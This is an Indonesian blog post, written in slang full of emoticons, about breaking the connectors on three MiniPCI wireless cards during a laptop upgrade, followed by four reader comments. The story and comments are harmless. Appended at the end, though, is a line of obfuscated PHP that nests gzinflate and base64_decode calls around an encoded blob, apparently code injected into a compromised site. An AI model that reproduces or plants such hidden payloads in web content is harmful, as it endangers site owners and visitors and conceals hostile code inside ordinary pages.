Delicious

Archives

Categories

Hancurnya 3 MiniPCI

  ozzie / 09/12/2007


MiniPCI = Ngoprek Gagal… 8-}8-}

Ceritanya sih pengen upgrade wireless di laptop:">:"> Sekalian pengen ngoprek wireless di slackware berhubung chipset nya Atheros\:d/\:d/ biasanya connect di laptop pake PCMCIA cisco aironet.. ditambah pigtail 10cm yang palanya pake MMCX ama NFemale buat berpetualang di outdoor.. ;));)).

MiniPCI

1st: bongkar laptop.. kebetulan udah ada antenna internal yang ujungnya pake UFL. dan masih ada slot minipci nganggur di dalemnya.. pasang minipci dan tancepin connectornya.. lalu nyalain laptop gak taunya bentrok IRQ nya :-ss:-ss.. bongkar lagih\:d/\:d/.. dengan rencana cadangan tuker minipci nya.. dalem hati “kayaknya minipci nya gak support deh”8->8-> … begitu di tarik connectornya:-ss:-ss:-ss… ternyata connector UFL nya lepas dari PCB nya :((:((:((.. gak kepake dah tuh minipci:-<… berhubung masih ada sisa.. pasang lagih minipci yg laen <:-p<:-p ternyata:-ss.. kejadian serupa terulang kembali 8-}8-}8-}.. hingga 3 kali berturut-turut :((:((:((

2nd: DONT TRY THIS AT HOME >:)>:) 8-}8-}

mau pinter kok mahal :-<:-<


« »


4 Responses to “Hancurnya 3 MiniPCI”

  1. tamu Says:

    Teruskan perjuangan mu …. :D

  2. yudhi Says:

    mau pinter kok mahal

    =)) oji oji =)) =))

  3. aris Says:

    boleh ndak tak minta … yari nyari driver ralink di osx86 ndak ada jeh…barngkali sampiyan baik hati mo ngasi.h bs tak coba di hackintoshku …

  4. handy Says:

    mau tanya, ada jual kabel dan konektor mini pci nya engk mas, yg utk MAIN dan AUX nya? kl ada harga berapa plus ongkos tiki ke bandung, utk eksperimen juga :0 thx uuu


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>